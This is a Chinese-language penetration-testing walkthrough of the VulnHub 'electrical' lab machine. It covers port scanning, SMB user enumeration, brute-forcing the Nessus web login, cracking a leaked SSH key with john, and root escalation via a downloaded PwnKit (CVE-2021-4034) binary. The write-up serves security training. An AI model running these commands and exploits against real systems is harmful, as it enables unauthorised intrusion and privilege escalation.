vulnhub靶场【digitalworld.local系列】的electrical靶机
前言
靶机:digitalworld.local-electrical,IP地址为192.168.10.12,后期因为卡顿,重新安装,ip地址后面为192.168.10.11
攻击:kali,IP地址为192.168.10.6
kali采用VMware虚拟机,靶机选择使用VMware打开文件,都选择桥接网络
这里官方给的有两种方式,一是直接使用virtualbox加载,另一种是通过VMware直接加载,也给出了iso镜像文件。
文章中涉及的靶机,来源于
vulnhub官网,想要下载,可自行访问官网下载,或者通过网盘下载https://pan.quark.cn/s/86cf8a398835
主机发现
使用arp-scan -l或netdiscover -r 192.168.10.1/24扫描
也可以使用nmap等工具进行
信息收集
使用nmap扫描端口
扫描tcp端口,并保存于nmap-tcp
nmap -sT 192.168.10.12 --min-rate=1000 -p- -oA nmap-tcp
扫描常见的20个udp端口,不过这里的端口大部分都是不确定的情况
nmap -sU 192.168.10.12 --top-ports 20 -T4 -oA nmap-udp
把前面扫描出的tcp、udp端口,进行处理,只取端口号
grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','
#这里就是包括可能开放的端口都不要,因为是靶机,可能过滤的话,也会无法进一步扫描
ports=22,80,8080,68,69,138,161,631,1434,1900
对特定的端口号进行深入探测
nmap -sV -O -sC -sT 192.168.10.12 -p $ports -oA detail
使用脚本检测有无漏洞
nmap --script=vuln 192.168.10.12 -p $ports -oA vuln
SMB探测
使用enum4linux尝试进行枚举,发现两个分享print$和IPC$,并还有两个用户govindasamy和electrical
8834端口探测
这里需要注意,使用浏览器访问时需要加上https协议
https://192.168.10.12:8834
查看页面源代码也没有信息泄露,那么尝试识别一下,使用whatweb测试
再使用浏览器插件wappalyzer识别
尝试进行目录爆破,可以使用dirb或dirsearch进行测试
dirsearch -u https://192.168.10.12:8834 -x 403,404 -e js,txt,zip,bak,cfm,dbm
发现有api,访问之后,发现有很多功能
测试这些api功能后,基本上都是需要登录的,无意义
网站密码爆破
尝试进行抓取数据包然后爆破,以前面两个用户名为测试,我这里是使用burp的
选择攻击点、攻击模式、以及字典的选择
这里的默认字典,只有burp pro版本中有,若使用社区版,可以加载密码字典,比如加载kali中的/usr/share/wordlists/fasttrack.txt字典或rockyou.txt也行
开始攻击后,等一会即可发现成功获取一个,用户名govindasamy和弱密码password
敏感信息泄露
下面的靶机因为重装,ip地址更改为
192.168.10.11
输入密码进行登录,登录后发现是nessus的漏洞扫描的web界面,之前也搜索过对应版本的nessus漏洞,发现并没有可利用的,那么在这个web ui界面进行探测。
这里建议使用burp抓取全程的数据包
在测试scan中的credentialed check时,点击其配置configuration,发现一个文本域,向下居然有内容,并且还是某一个的私钥,这个可能是靶机上的,也只是可能,需要进一步测试
把这个内容复制并保存在kali中的一个文件中
并且在配置中,默认的账户就是electrical
尝试进行登录可以明显的看到,对私钥进行了加密操作
chmod 600 id1
ssh electrical@192.168.10.11 -p 22222 -i id1
这里先使用john进行破解测试
ssh2john id1 > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
可以看到密码就是用户名,啧,之前好像在哪里看到过,好像在burp抓包的时候与发现ssh私钥的同一界面,不过无所谓了
靶机内信息收集
使用ssh进行登录
查看local.txt文件
查看当前靶机内有哪些用户
ls -al /home
cat /etc/passwd | grep /bin/bash
查看网络状态连接
ss -antulp
netstat -antulp
查看ip地址状态
ip add
查看系统进程
ps aux | grep root
top
使用find寻找具有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
发现有sudo,但是这里不知道electrical的密码,测试后,发现果然需要密码,所以暂时搁置
查看内核版本及系统版本
uname -a
uname -r
cat /etc/issue
cat /etc/*release
lsb_release
查看定时任务
crontab -l
cat /etc/crontab
atq
注意,下面的脚本上传,都是我个人
kali的路径,所以要自行更改的,并且下面的脚本都是在github上的项目,可自行去搜索下载。当然为了自己方便,我会放置在自己的网盘中的
通过scp上传pspy64检测是否有隐藏的任务
#在kali上执行该命令,通过scp传输
scp -P 22222 -i ../digital/electrical/id1 pspy64 electrical@192.168.10.11:/tmp
不过在靶机上执行pspy64后,并未有什么发现
那么再上传一个脚本linpeas.sh,用于检测
#在kali上执行该命令,通过scp传输
scp -P 22222 -i ../digital/electrical/id1 linpeas.sh electrical@192.168.10.11:/tmp
检测后,也是没有任何收获,不过还是看到一些东西,如第三方工具gcc等,并没有安装,也就表示无法在靶机内编译文件,也看到了可能存在的漏洞
提权
之前经过使用find寻找具有SUID权限文件时,发现有/usr/libexec/polkit-agent-helper-1和/usr/bin/pkexec,结合前面的pwnkit漏洞的发现,也就是CVE-2021-4034,猜测也许可以利用
通过AI搜索,以下为内容
CVE-2021-4034(PwnKit)漏洞:
主要利用了具有 SUID 权限的
/usr/bin/pkexec文件来实现提权
pkexec是 PolicyKit 提供的一个工具,用于以特权用户(通常是root)身份执行命令。
PolicyKit是一个用于在 Linux 系统上管理特权操作的框架,pkexec本身被设计为一个安全机制,用于在用户请求执行特权操作时进行权限验证。然而,CVE - 2021 - 4034 漏洞的存在使得攻击者可以绕过
pkexec的权限验证机制。该漏洞是由于pkexec在处理环境变量时存在缓冲区溢出漏洞,攻击者可以构造恶意的环境变量,使得pkexec在执行过程中出现内存错误,从而改变程序的执行流程,最终以root权限执行任意命令。
下面是github中的一些poc,因为这里无法直接在靶机编译,所以使用编译好的文件,github项目地址为https://github.com/ly4k/PwnKit
采用这个编译好的
首先下载到kali中,然后通过scp下载到靶机内
#下载
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit#传输
scp -P 22222 -i /id1 PwnKit electrical@192.168.10.11:/tmp
然后在靶机上加上执行权限后直接执行
chmod +x PwnKit
./PwnKit
提权成功,查看/root目录下的文件
总结
该靶机的考察如下:
- 对于不存在漏洞的网站,并且需要登录才能看到内容,而且不支持注册的网站,或许爆破是最好的手段了,这里的爆破不仅仅包括密码爆破
- 存在
smb服务的,都可以枚举一下用户,这个会有用处的 - 对于网站中的信息,也就是每一个模块,最好就是通过
burp抓取数据包,至少要有历史记录,这样复盘很轻松。且网站中可能存在的隐藏信息,不一定通过页面源代码就能看到,建议使用浏览器的开发者工具,这里就是通过发现了一个私钥文件,才有下一步的 ssh的私钥文件,对于设置密码的,可以通过john套件进行处理,ssh2john转换,john破解- 对于提权,这里借助的是几个脚本
pspy64、linpeas.sh发现的,当然还是配合find寻找到的SUID权限文件结合起来的。 - 考察
pwnkit提权,也就是cve-2021-4034,这个可以通过github下载